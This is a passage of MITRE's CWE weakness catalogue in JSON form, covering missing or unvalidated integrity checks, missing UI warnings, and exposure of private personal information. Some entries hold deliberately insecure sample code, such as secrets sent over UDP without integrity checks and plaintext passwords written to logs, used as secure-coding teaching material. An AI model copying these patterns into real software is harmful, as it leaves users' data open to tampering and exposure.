determining if data has been corrupted in transmission. The lack of checksum functionality in a protocol removes the first application-level check of data that can be used. The end-to-end philosophy of checks states that integrity checks should be performed at the lowest level that they can be completely implemented. Excluding further sanity checks and input validation performed by applications, the protocol\'s checksum is the most important level of checksum, since it can be performed more completely than at any previous level and takes into account entire messages, as opposed to single packets.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"354","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data that is parsed and used may be corrupted."},{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Other"],"Note":"Without a checksum it is impossible to determine if any changes have been made to the data after it was sent."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Add an appropriately sized checksum to the protocol, ensuring that data received may be simply validated before it is parsed and used."},{"Phase":"Implementation","Description":"Ensure that the checksums present in the protocol design are properly implemented and added to each message before it is sent."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a request packet is received, and privileged information is sent to the requester:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"#text":"DatagramPacket rp = new DatagramPacket(rData,rData.length);outSock.receive(rp);InetAddress IPAddress = rp.getAddress();int port = rp.getPort();out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out, out.length, IPAddress, port);outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}},"Body_Text":"The response containing secret data has no integrity check associated with it, allowing an attacker to alter the message without detection."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to add integrity check value"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"389"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"665"}},{"attr":{"@_CAPEC_ID":"74"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 15: Not Updating Easily.&#34; Page 231"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Failure to Add Integrity Check Value","attr":{"@_Date":"2010-12-13"}}}},"354":{"attr":{"@_ID":"354","@_Name":"Improper Validation of Integrity Check Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not validate or incorrectly validates the integrity check values or \\"checksums\\" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission.","Extended_Description":"Improper validation of checksums before use results in an unnecessary risk that can easily be mitigated. The protocol specification describes the algorithm used for calculating the checksum. It is then a simple matter of implementing the calculation and verifying that the calculated checksum and the received checksum match. Improper verification of the calculated checksum and the received checksum can lead to far greater consequences.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"353","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"Integrity checks usually use a secret key that helps authenticate the data origin. Skipping integrity checking generally opens up the possibility that new data from an invalid source can be injected."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data that is parsed and used may be corrupted."},{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Other"],"Note":"Without a checksum check, it is impossible to determine if any changes have been made to the data after it was sent."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that the checksums present in messages are properly checked in accordance with the protocol specification before they are parsed and used."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0); serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","xhtml:br":["","",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"#text":"DatagramPacket packet = new DatagramPacket(data,data.length,IPAddress, port);socket.send(sendPacket);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check integrity check value"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"145"}},{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Check Integrity Check Value","attr":{"@_Date":"2009-03-10"}}}},"356":{"attr":{"@_ID":"356","@_Name":"Product UI does not Warn User of Unsafe Actions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system.","Extended_Description":"Software systems should warn users that a potentially dangerous action may occur if the user proceeds. For example, if the user downloads a file from an unknown source and attempts to execute the file on their machine, then the application\'s GUI can indicate that the file is unsafe.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1055","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1055"},{"Reference":"CVE-1999-0794","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0794"},{"Reference":"CVE-2000-0277","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0277"},{"Reference":"CVE-2000-0517","Description":"Product does not warn user about a certificate if it has already been accepted for a different site. Possibly resultant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0517"},{"Reference":"CVE-2005-0602","Description":"File extractor does not warn user it setuid/setgid files could be extracted. Overlaps privileges/permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0602"},{"Reference":"CVE-2000-0342","Description":"E-mail client allows bypass of warning for dangerous attachments via a Windows .LNK file that refers to the attachment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product UI does not warn user of unsafe actions"}},"Notes":{"Note":[{"#text":"Often resultant, e.g. in unhandled error conditions.","attr":{"@_Type":"Relationship"}},{"#text":"Can overlap privilege errors, conceptually at least.","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"357":{"attr":{"@_ID":"357","@_Name":"Insufficient UI Warning of Dangerous Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-1099","Description":"User not sufficiently warned if host key mismatch occurs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1099"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient UI warning of dangerous operations"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"358":{"attr":{"@_ID":"358","@_Name":"Improperly Implemented Security Check for Standard","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"345","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"290","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":"This is an implementation error, in which the algorithm/technique requires certain security-related behaviors or conditions that are not implemented or checked properly, thus causing a vulnerability."}}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0862","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"},{"Reference":"CVE-2002-0970","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970"},{"Reference":"CVE-2002-1407","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1407"},{"Reference":"CVE-2005-0198","Description":"Logic error prevents some required conditions from being enforced during Challenge-Response Authentication Mechanism with MD5 (CRAM-MD5).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0198"},{"Reference":"CVE-2004-2163","Description":"Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163"},{"Reference":"CVE-2005-2181","Description":"Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181"},{"Reference":"CVE-2005-2182","Description":"Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182"},{"Reference":"CVE-2005-2298","Description":"Security check not applied to all components, allowing bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2298"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Implemented Security Check for Standard"}},"Notes":{"Note":{"#text":"This is a \\"missing step\\" error on the product side, which can overlap weaknesses such as insufficient verification and spoofing. It is frequently found in cryptographic and authentication errors. It is sometimes resultant.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"359":{"attr":{"@_ID":"359","@_Name":"Exposure of Private Personal Information to an Unauthorized Actor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not properly prevent a person\'s private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected.","Extended_Description":{"xhtml:p":["There are many types of sensitive information that products must protect from attackers, including system data, communications, configuration, business secrets, intellectual property, and an individual\'s personal (private) information.  Private personal information may include a password, phone number, geographic location, personal messages, credit card number, etc.  Private information is important to consider whether the person is a user of the product, or part of a data set that is processed by the product.  An exposure of private information does not necessarily prevent the product from working properly, and in fact the exposure might be intended by the developer, e.g. as part of data sharing with other organizations.  However, the exposure of personal private information can still be undesirable or explicitly prohibited by law or regulation.","Some types of private information include:","Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry.","Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student\'s personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Government identifiers, such as Social Security Numbers","Contact information, such as home addresses and telephone numbers","Geographic location - where the user is (or was)","Employment history","Financial data - such as credit card numbers, salary, bank accounts, and debts","Pictures, video, or audio","Behavioral patterns - such as web surfing history, when certain activities are performed, etc.","Relationships (and types of relationships) with others - family, friends, contacts, etc.","Communications - e-mail addresses, private messages, text messages, chat logs, etc.","Health - medical conditions, insurance status, prescription records","Account passwords and other credentials"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Privacy violation"},{"Term":"Privacy leak"},{"Term":"Privacy leakage"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":{"Method":"Architecture or Design Review","Description":{"xhtml:p":"Private personal data can enter a program in a variety of ways:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Directly from the user in the form of a password or personal information","Accessed from a database or other data store by the application","Indirectly from a partner or other third party"]},"xhtml:p":"If the data is written to an external location - such as the console, file system, or network - a privacy violation may occur."}},"Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":{"xhtml:p":"Identify and consult all relevant regulations for personal privacy.  An organization may be required to comply with certain federal and state regulations, depending on its location, the type of business it conducts, and the nature of any private data it handles.  Regulations may include Safe Harbor Privacy Framework [REF-340], Gramm-Leach Bliley Act (GLBA) [REF-341], Health Insurance Portability and Accountability Act (HIPAA) [REF-342], General Data Protection Regulation (GDPR) [REF-1047], California Consumer Privacy Act (CCPA) [REF-1048], and others."}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"Carefully evaluate how secure design may interfere with privacy, and vice versa.  Security and privacy concerns often seem to compete with each other. From a security perspective, all important operations should be recorded so that any anomalous activity can later be identified. However, when private data is involved, this practice can in fact create risk. Although there are many ways in which private data can be handled unsafely, a common risk stems from misplaced trust. Programmers often trust the operating environment in which a program runs, and therefore believe that it is acceptable store private information on the file system, in the registry, or in other locally-controlled resources. However, even if access to certain resources is restricted, this does not guarantee that the individuals who do have access can be trusted."}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the getPassword() function returns the user-supplied plaintext password associated with the account.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"pass = GetPassword();...dbmsLog.WriteLine(id + \\":\\" + pass + \\":\\" + type + \\":\\" + tstamp);","xhtml:br":["",""]}},"Body_Text":"The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"&lt;uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/&gt;"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]},{"Intro_Text":"In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [REF-338]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Privacy Violation"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO13-J","Entry_Name":"Do not log sensitive information outside a trust boundary"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"464"}},{"attr":{"@_CAPEC_ID":"467"}},{"attr":{"@_CAPEC_ID":"508"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-338"}},{"attr":{"@_External_Reference_ID":"REF-339"}},{"attr":{"@_External_Reference_ID":"REF-340"}},{"attr":{"@_External_Reference_ID":"REF-341"}},{"attr":{"@_External_Reference_ID":"REF-342"}},{"attr":{"@_External_Reference_ID":"REF-343"}},{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-172"}},{"attr":{"@_External_Reference_ID":"REF-1047"}},{"attr":{"@_External_Reference_ID":"REF-1048"}}]},"Notes":{"Note":{"#text":"This entry overlaps many other entries that are not organized around the kind of sensitive information that is exposed.  However, because privacy is treated with such importance due to regulations and other factors, and it may be useful for weakness-finding tools to highlight capabilities that detect personal private information instead of system information, it is not clear whether - and how - this entry should be deprecated.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Name, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content 